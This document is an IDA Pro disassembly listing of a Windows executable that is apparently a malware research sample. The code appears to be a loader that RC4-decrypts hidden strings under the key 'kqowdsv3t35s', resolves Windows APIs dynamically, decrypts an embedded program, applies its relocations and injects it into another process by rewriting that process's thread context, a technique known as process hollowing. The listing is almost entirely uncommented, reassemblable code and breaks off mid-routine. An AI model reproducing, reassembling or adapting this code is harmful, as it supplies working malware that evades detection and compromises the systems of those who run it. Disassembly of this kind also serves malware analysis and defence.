;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E319E121F01E9C3A2C93B721D9FDDCFF
; File Name : u:\work\e319e121f01e9c3a2c93b721d9fddcff_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000E3E ( 3646.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401000(SIZE_T dwBytes)
sub_401000 proc near ; CODE XREF: sub_40102B+12�p
; sub_401160+13E�p ...
dwBytes = dword ptr 4
push esi
push edi
push [esp+8+dwBytes] ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov ecx, [esp+8+dwBytes]
mov esi, ecx
mov edx, eax
shr ecx, 2
xor eax, eax
mov edi, edx
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
pop edi
mov eax, edx
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40102B proc near ; CODE XREF: sub_4017D8+38�p
; sub_4017D8+66�p ...
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 110h
mov eax, [ebp+arg_8]
lea eax, [eax+eax*4]
shl eax, 1
push eax ; dwBytes
call sub_401000
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz short loc_40104C
leave
retn
; ---------------------------------------------------------------------------
loc_40104C: ; CODE XREF: sub_40102B+1D�j
xor eax, eax
loc_40104E: ; CODE XREF: sub_40102B+30�j
mov [ebp+eax+var_110], al
inc eax
cmp eax, 0FFh
jle short loc_40104E
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push esi
push edi
mov esi, 100h
loc_40106D: ; CODE XREF: sub_40102B+94�j
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
loc_401073: ; CODE XREF: sub_40102B+4D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401073
sub eax, ecx
mov edi, eax
mov eax, [ebp+var_4]
xor edx, edx
div edi
mov ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
lea ecx, [ebp+ecx+var_110]
mov bl, [ecx]
mov edi, esi
movsx edx, byte ptr [edx+eax]
add edx, [ebp+var_8]
movzx eax, bl
add eax, edx
cdq
idiv edi
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov [eax], bl
jle short loc_40106D
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jle short loc_401133
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
mov [ebp+var_10], eax
loc_4010D7: ; CODE XREF: sub_40102B+106�j
mov eax, [ebp+var_4]
cdq
mov ecx, esi
idiv ecx
mov edi, esi
lea ecx, [ebp+edx+var_110]
mov bl, [ecx]
movzx eax, bl
add eax, [ebp+var_8]
cdq
idiv edi
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov edx, [ebp+var_C]
mov [eax], bl
mov eax, [ebp+var_4]
lea edi, [eax+edx]
movzx eax, byte ptr [ecx]
movzx ecx, bl
add eax, ecx
cdq
mov ecx, esi
idiv ecx
mov ecx, [ebp+var_10]
mov al, [ebp+edx+var_110]
xor al, [ecx+edi]
inc [ebp+var_4]
mov [edi], al
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4010D7
loc_401133: ; CODE XREF: sub_40102B+A1�j
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_40102B endp
; =============== S U B R O U T I N E =======================================
sub_40113B proc near ; CODE XREF: sub_401160+5C�p
; sub_401160+AD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_40115F
mov ecx, [esp+arg_0]
mov edx, dword_403274
add ecx, edx
loc_40114F: ; CODE XREF: sub_40113B+22�j
mov dl, [ecx+eax]
mov byte_4032F8[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_40114F
locret_40115F: ; CODE XREF: sub_40113B+6�j
retn
sub_40113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401160 proc near ; CODE XREF: start+53�p
var_13C = byte ptr -13Ch
var_5C = byte ptr -5Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = word ptr -16h
var_8 = word ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 13Ch
mov eax, dword_403274
push ebx
push esi
mov esi, dword_40326C
add eax, esi
mov bl, [eax]
mov byte_403290, bl
mov cl, [eax+1]
push edi
mov edi, dword_4312C4
mov byte_4032E8, cl
mov al, [eax+2]
neg byte_4032E8
sub edi, esi
neg bl
neg al
cmp edi, 40h
mov [ebp+var_4], edi
mov byte_403290, bl
mov byte_403270, al
jb loc_40124D
push 40h
add esi, 3
push esi
call sub_40113B
pop ecx
pop ecx
mov byte_403338, 0
xor esi, esi
loc_4011CC: ; CODE XREF: sub_401160+82�j
mov cl, byte_4032E8
lea eax, dword_4032F9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_4011CC
push 10h
pop ecx
mov esi, offset byte_4032F8
lea edi, [ebp+var_5C]
rep movsd
mov eax, [ebp+var_20]
lea ecx, [eax+18h]
cmp [ebp+var_4], ecx
jb short loc_40124D
mov ecx, dword_40326C
add eax, ecx
mov [ebp+var_4], eax
add eax, 3
push 18h
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_403310, 0
xor esi, esi
loc_40121D: ; CODE XREF: sub_401160+D3�j
mov cl, byte_4032E8
lea eax, dword_4032F9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_40121D
push 6
pop ecx
mov esi, offset byte_4032F8
lea edi, [ebp+var_1C]
rep movsd
mov esi, 0E0h
cmp [ebp+var_8], si
jz short loc_401254
loc_40124D: ; CODE XREF: sub_401160+50�j
; sub_401160+9A�j
xor al, al
jmp loc_40132A
; ---------------------------------------------------------------------------
loc_401254: ; CODE XREF: sub_401160+EB�j
mov eax, [ebp+var_4]
add eax, 1Bh
push esi
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_4033D8, 0
xor edi, edi
loc_40126C: ; CODE XREF: sub_401160+121�j
mov cl, byte_4032E8
lea eax, dword_4032F9[edi]
add [eax-1], bl
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_40126C
movzx eax, [ebp+var_16]
push 38h
pop ecx
mov esi, offset byte_4032F8
lea edi, [ebp+var_13C]
rep movsd
lea esi, [eax+eax*4]
shl esi, 3
push esi ; dwBytes
call sub_401000
mov ecx, [ebp+var_20]
mov ebx, eax
mov eax, dword_40326C
lea eax, [eax+ecx+0FBh]
push esi
push eax
call sub_40113B
add esp, 0Ch
xor ecx, ecx
test esi, esi
mov byte_4032F8[esi], 0
jbe short loc_4012E8
loc_4012CB: ; CODE XREF: sub_401160+186�j
mov dl, byte_403290
lea eax, dword_4032F9[ecx]
add [eax-1], dl
mov dl, byte_4032E8
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_4012CB
loc_4012E8: ; CODE XREF: sub_401160+169�j
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F8
mov edi, ebx
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov edi, [ebp+arg_0]
push 10h
pop ecx
push 6
lea esi, [ebp+var_5C]
rep movsd
mov edi, [ebp+arg_4]
pop ecx
lea esi, [ebp+var_1C]
rep movsd
mov edi, [ebp+arg_8]
push 38h
pop ecx
lea esi, [ebp+var_13C]
rep movsd
mov [eax], ebx
mov al, 1
loc_40132A: ; CODE XREF: sub_401160+EF�j
pop edi
pop esi
pop ebx
leave
retn
sub_401160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40132F proc near ; CODE XREF: start+75�p
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_40134C
lea ecx, [eax+1]
imul ecx, esi
loc_40134C: ; CODE XREF: sub_40132F+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401386
push ebx
mov ebx, [ebp+arg_C]
push edi
add ebx, 8
mov [ebp+arg_8], eax
loc_401362: ; CODE XREF: sub_40132F+53�j
mov edi, [ebx]
test edi, edi
jz short loc_40137C
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_401376
add ecx, edi
jmp short loc_40137C
; ---------------------------------------------------------------------------
loc_401376: ; CODE XREF: sub_40132F+41�j
inc eax
imul eax, esi
add ecx, eax
loc_40137C: ; CODE XREF: sub_40132F+37�j
; sub_40132F+45�j
add ebx, 28h
dec [ebp+arg_8]
jnz short loc_401362
pop edi
pop ebx
loc_401386: ; CODE XREF: sub_40132F+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_40132F endp
; =============== S U B R O U T I N E =======================================
sub_40138B proc near ; CODE XREF: sub_4013A5+B4�p
; sub_4013A5:loc_4014EB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_40139E
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40139E: ; CODE XREF: sub_40138B+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_40138B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013A5 proc near ; CODE XREF: start+A8�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword_403274
push ebx
push esi
mov esi, dword_40326C
add eax, esi
mov bl, [eax]
mov byte_403290, bl
mov cl, [eax+1]
mov byte_4032E8, cl
mov al, [eax+2]
neg byte_4032E8
neg al
mov byte_403270, al
mov eax, [ebp+arg_C]
neg bl
mov byte_403290, bl
push edi
mov edi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_401407
mov ecx, [ebp+arg_10]
add ecx, 14h
loc_4013F9: ; CODE XREF: sub_4013A5+60�j
mov edx, [ecx]
cmp edx, edi
jnb short loc_401401
mov edi, edx
loc_401401: ; CODE XREF: sub_4013A5+58�j
add ecx, 28h
dec eax
jnz short loc_4013F9
loc_401407: ; CODE XREF: sub_4013A5+4C�j
push edi
add esi, 3
push esi
call sub_40113B
pop ecx
xor esi, esi
test edi, edi
pop ecx
mov byte_4032F8[edi], 0
jbe short loc_401437
loc_401420: ; CODE XREF: sub_4013A5+90�j
mov cl, byte_4032E8
lea eax, dword_4032F9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, edi
jb short loc_401420
loc_401437: ; CODE XREF: sub_4013A5+79�j
mov ecx, edi
mov edi, [ebp+arg_14]
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F8
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [eax+3Ch]
call sub_40138B
add eax, [ebp+arg_14]
and [ebp+var_4], 0
mov [ebp+arg_14], eax
mov eax, [ebp+arg_4]
add esp, 8
cmp word ptr [eax+6], 0
jbe loc_40150C
mov ebx, [ebp+arg_10]
add ebx, 8
loc_40147F: ; CODE XREF: sub_4013A5+161�j
mov esi, [ebx+8]
test esi, esi
mov eax, [ebx]
jbe short loc_4014E5
cmp esi, eax
jbe short loc_40148E
mov esi, eax
loc_40148E: ; CODE XREF: sub_4013A5+E5�j
mov eax, [ebx+0Ch]
mov ecx, dword_40326C
lea eax, [eax+ecx+3]
push esi
push eax
call sub_40113B
pop ecx
xor eax, eax
test esi, esi
pop ecx
mov byte_4032F8[esi], 0
jbe short loc_4014C2
loc_4014B1: ; CODE XREF: sub_4013A5+11B�j
mov cl, byte_403270
add byte_4032F8[eax], cl
inc eax
cmp eax, esi
jb short loc_4014B1
loc_4014C2: ; CODE XREF: sub_4013A5+10A�j
mov edi, [ebp+arg_14]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032F8
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [ebx]
jmp short loc_4014EB
; ---------------------------------------------------------------------------
loc_4014E5: ; CODE XREF: sub_4013A5+E1�j
test eax, eax
jz short loc_4014F6
push ecx
push eax
loc_4014EB: ; CODE XREF: sub_4013A5+13E�j
call sub_40138B
add esp, 8
add [ebp+arg_14], eax
loc_4014F6: ; CODE XREF: sub_4013A5+142�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+var_4]
add ebx, 28h
cmp [ebp+var_4], eax
jl loc_40147F
loc_40150C: ; CODE XREF: sub_4013A5+CE�j
pop edi
pop esi
mov al, 1
pop ebx
leave
retn
sub_4013A5 endp
; =============== S U B R O U T I N E =======================================
sub_401513 proc near ; CODE XREF: sub_401656+C7�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_8]
mov eax, [ecx+88h]
test eax, eax
jz short locret_401582
cmp dword ptr [ecx+8Ch], 0
jz short locret_401582
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [ecx+1Ch]
add eax, edx
cmp dword ptr [eax+4], 0
jz short loc_401581
push ebx
push edi
loc_401540: ; CODE XREF: sub_401513+6A�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
test ecx, ecx
lea edi, [eax+8]
jle short loc_401577
mov ebx, ecx
loc_401551: ; CODE XREF: sub_401513+62�j
xor edx, edx
mov dx, [edi]
mov ecx, edx
and ecx, 0FFFh
add ecx, [esp+0Ch+arg_10]
and dx, 0F000h
add ecx, [eax]
cmp dx, 3000h
jnz short loc_401572
add [ecx], esi
loc_401572: ; CODE XREF: sub_401513+5B�j
inc edi
inc edi
dec ebx
jnz short loc_401551
loc_401577: ; CODE XREF: sub_401513+3A�j
cmp dword ptr [edi+4], 0
mov eax, edi
jnz short loc_401540
pop edi
pop ebx
loc_401581: ; CODE XREF: sub_401513+29�j
pop esi
locret_401582: ; CODE XREF: sub_401513+C�j
; sub_401513+15�j
retn
sub_401513 endp
; =============== S U B R O U T I N E =======================================
sub_401583 proc near ; CODE XREF: sub_40159B+81�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push offset dword_4032A4
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
call dword_4312A0
retn
sub_401583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159B proc near ; CODE XREF: start+C5�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 48h
push esi
mov esi, [ebp+arg_4]
push edi
push 10h
pop ecx
xor edx, edx
push esi
xor eax, eax
mov [ebp+var_48], edx
lea edi, [ebp+var_44]
rep stosd
lea eax, [ebp+var_48]
push eax
push edx
push edx
push 4
push edx
push edx
push edx
push [ebp+arg_0]
push edx
call dword_4312AC
test eax, eax
jz short loc_401633
mov edi, [ebp+arg_C]
push ebx
push edi
mov dword ptr [edi], 10007h
push dword ptr [esi+4]
call dword_4032D8
mov ebx, [ebp+arg_10]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call dword_40328C
mov edi, [ebx]
jmp short loc_401615
; ---------------------------------------------------------------------------
loc_401603: ; CODE XREF: sub_40159B+8B�j
cmp dword_4032B4, 10000h
jz short loc_401628
add edi, dword_4032B0
loc_401615: ; CODE XREF: sub_40159B+66�j
push 1Ch
push edi
push dword ptr [esi]
push 0
call sub_401583
add esp, 10h
test eax, eax
jnz short loc_401603
loc_401628: ; CODE XREF: sub_40159B+72�j
sub edi, [ebx]
xor eax, eax
mov [ebx+4], edi
inc eax
pop ebx
jmp short loc_401635
; ---------------------------------------------------------------------------
loc_401633: ; CODE XREF: sub_40159B+32�j
xor eax, eax
loc_401635: ; CODE XREF: sub_40159B+96�j
pop edi
pop esi
leave
retn
sub_40159B endp
; =============== S U B R O U T I N E =======================================
sub_401639 proc near ; CODE XREF: sub_401656+90�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_401653
cmp dword ptr [eax+8Ch], 0
jz short loc_401653
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401653: ; CODE XREF: sub_401639+B�j
; sub_401639+14�j
xor eax, eax
retn
sub_401639 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401656 proc near ; CODE XREF: start+117�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_30 = dword ptr 38h
arg_D4 = dword ptr 0DCh
arg_E0 = dword ptr 0E8h
arg_2FC = dword ptr 304h
arg_300 = dword ptr 308h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push ebx
push esi
push edi
mov edi, [ebp+arg_2FC]
cmp [eax+1Ch], edi
mov esi, 3000h
jnz short loc_401697
mov eax, [ebp+arg_300]
cmp [ebp+arg_18], eax
ja short loc_401697
mov ebx, [ebp+arg_20]
lea ecx, [ebp+arg_300]
push ecx
push 40h
push eax
push edi
push ebx
mov dword_4312C8, edi
call dword_4312B4
jmp short loc_4016DA
; ---------------------------------------------------------------------------
loc_401697: ; CODE XREF: sub_401656+17�j
; sub_401656+22�j
mov ebx, [ebp+arg_20]
push edi
push ebx
mov dword_4032DC, ebx
mov dword_4312A4, edi
call dword_403288
test eax, eax
jnz short loc_4016B9
mov byte ptr [ebp+arg_300+3], 1
loc_4016B9: ; CODE XREF: sub_401656+5A�j
cmp byte ptr [ebp+arg_300+3], 1
jnz short loc_4016DA
mov eax, [ebp+arg_C]
push 40h
push esi
push [ebp+arg_18]
push dword ptr [eax+1Ch]
push ebx
call dword_40327C
mov dword_4312C8, eax
loc_4016DA: ; CODE XREF: sub_401656+3F�j
; sub_401656+6A�j
cmp dword_4312C8, 0
jnz short loc_401735
push [ebp+arg_C]
call sub_401639
add esp, 4
test eax, eax
jz short loc_40172E
push 40h
push esi
push [ebp+arg_18]
push 0
push ebx
call dword_40327C
test eax, eax
mov dword_4312C8, eax
jz short loc_40172E
mov esi, [ebp+arg_C]
push 0
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401513
add esp, 1Ch
cmp dword_4312C8, 0
jnz short loc_401738
loc_40172E: ; CODE XREF: sub_401656+9A�j
; sub_401656+B2�j
xor eax, eax
loc_401730: ; CODE XREF: sub_401656+154�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401735: ; CODE XREF: sub_401656+8B�j
mov esi, [ebp+arg_C]
loc_401738: ; CODE XREF: sub_401656+D6�j
mov eax, [ebp+arg_D4]
push 0
push 4
push offset dword_4312C8
add eax, 8
push eax
push ebx
call dword_4032E4
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_4312C8
mov edx, [ebp+arg_14]
mov [eax+edx+34h], ecx
mov eax, dword_4312C8
cmp eax, edi
mov [ebp+arg_30], 10007h
jnz short loc_401783
mov eax, [esi+10h]
add eax, [esi+1Ch]
mov [ebp+arg_E0], eax
jmp short loc_40178E
; ---------------------------------------------------------------------------
loc_401783: ; CODE XREF: sub_401656+11D�j
mov ecx, [esi+10h]
add ecx, eax
mov [ebp+arg_E0], ecx
loc_40178E: ; CODE XREF: sub_401656+12B�j
mov eax, [ebp+arg_24]
lea ecx, [ebp+arg_30]
push ecx
push eax
mov dword_4312B8, ebx
mov dword_403294, eax
call dword_4032EC
xor eax, eax
inc eax
jmp short loc_401730
sub_401656 endp
; =============== S U B R O U T I N E =======================================
sub_4017AC proc near ; CODE XREF: start+14C�p
push dword_403294
mov byte_4312BC, 1
call dword_403278
retn
sub_4017AC endp
; =============== S U B R O U T I N E =======================================
sub_4017C0 proc near ; CODE XREF: sub_401BF5+5B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, dword_40326C
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
mov dword_4312A8, eax
retn
sub_4017C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017D8 proc near ; CODE XREF: start+11�p
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 7
pop ecx
xor eax, eax
mov [ebp+var_2C], 0
lea edi, [ebp+var_2B]
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
push eax
push 13h
xor ebx, ebx
push offset dword_403000
mov esi, offset aKqowdsv3t35s ; "kqowdsv3t35s"
inc ebx
push esi
mov [ebp+var_8], 1Fh
mov [ebp+var_C], ebx
call sub_40102B
add esp, 0Ch
push eax
push 80000001h
call dword_4032D4
test eax, eax
jnz short loc_401870
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push 10h
push offset aEKtckeQeb@@3i ; "`KkQb@@3I"
push esi
call sub_40102B
add esp, 0Ch
push eax
push [ebp+var_4]
call dword_4312C0
test eax, eax
jnz short loc_401867
push 2
mov edi, offset dword_402014
lea esi, [ebp+var_2C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_401867
xor bl, bl
loc_401867: ; CODE XREF: sub_4017D8+7A�j
; sub_4017D8+8B�j
push [ebp+var_4]
call dword_403280
loc_401870: ; CODE XREF: sub_4017D8+4E�j
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
sub_4017D8 endp
; =============== S U B R O U T I N E =======================================
sub_401877 proc near ; CODE XREF: start+C�p
hModule = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push 9
push offset aCWZ ; "cWz"
mov esi, offset aKqowdsv3t35s ; "kqowdsv3t35s"
push esi
call sub_40102B
mov edi, ds:LoadLibraryA
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 0Ch
push offset aRiuFFswZ ; "rUʔ-wz"
push esi
mov ebp, eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 0Ch
push offset dword_403118
push esi
mov ebx, eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call edi ; LoadLibraryA
push 11h
push offset aDcXXndGtai_c ; "cxn`TAI;_C"
push esi
mov [esp+20h+hModule], eax
call sub_40102B
mov edi, ds:GetProcAddress
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 0Eh
push offset dword_403024
push esi
mov dword_4032C0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 12h
push offset aBeOIlVgeyj0uc ; "eOʨlveyJ0UC"
push esi
mov dword_40327C, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset dword_403240
push esi
mov dword_4032E4, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 14h
push offset dword_403048
push esi
mov dword_403280, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 0Eh
push offset aXeZAndPxegn ; "eZNpeGn"
push esi
mov dword_403288, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Ch
push offset aDrinAjVsr ; "rNJvr"
push esi
mov dword_4312AC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Ch
push offset dword_403014
push esi
mov dword_403278, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset aXeZAxV ; "eZXv"
push esi
mov dword_4032D0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset aErooKPqx@jN ; "roNJ{Px@J%N"
push esi
mov dword_4032A0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 1Eh
push offset dword_4031D4
push esi
mov dword_4032EC, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
push 8
push offset aDr_ssr ; "r_r"
push esi
mov dword_40329C, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset aSrooKPqx@jN ; "roNJ{Px@J%N"
push esi
mov dword_4032E0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 10h
push offset aDrJAlpsrCqj ; "rjڝlrcQj%{"
push esi
mov dword_4032D8, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 11h
push offset dword_4030A0
push esi
mov dword_4312C0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Eh
push offset aAIoSrzVvoqw ; "~OڙrvoqW"
push esi
mov dword_40328C, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 12h
push offset aSrovKUszqaWts ; "rvkUzQa<WT"
push esi
mov dword_4312A0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset aDrTApaJ ; "rtߝpj"
push esi
mov dword_4032F0, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [esp+18h+hModule] ; hModule
call edi ; GetProcAddress
push 10h
push offset dword_4030C8
push esi
mov dword_4032D4, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 0Bh
push offset aSroFEIx ; "r}Ɣ{i"
push esi
mov dword_4312B4, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call edi ; GetProcAddress
push 13h
push offset dword_4031A8
push esi
mov dword_403298, eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebp ; hModule
call edi ; GetProcAddress
xor ecx, ecx
cmp dword_4032D0, ecx
mov dword_4032C4, eax
jz loc_401BA2
cmp dword_40327C, ecx
jz loc_401BA2
cmp dword_4312B4, ecx
jz loc_401BA2
cmp dword_403288, ecx
jz loc_401BA2
cmp dword_4032E4, ecx
jz loc_401BA2
cmp dword_4032EC, ecx
jz short loc_401BA2
cmp dword_403278, ecx
jz short loc_401BA2
cmp dword_4032A0, ecx
jz short loc_401BA2
cmp dword_403298, ecx
jz short loc_401BA2
cmp dword_4032E0, ecx
jz short loc_401BA2
cmp dword_4312AC, ecx
jz short loc_401BA2
cmp dword_4032D8, ecx
jz short loc_401BA2
cmp dword_40328C, ecx
jz short loc_401BA2
cmp dword_4312A0, ecx
jz short loc_401BA2
cmp dword_4032F0, ecx
jz short loc_401BA2
cmp dword_4032D4, ecx
jz short loc_401BA2
cmp dword_4312C0, ecx
jz short loc_401BA2
cmp dword_403280, ecx
jz short loc_401BA2
cmp dword_4032C0, ecx
jz short loc_401BA2
cmp eax, ecx
jz short loc_401BA2
cmp dword_40329C, ecx
jz short loc_401BA2
mov al, 1
jmp short loc_401BAB
; ---------------------------------------------------------------------------
loc_401BA2: ; CODE XREF: sub_401877+275�j
; sub_401877+281�j ...
push ebx ; hLibModule
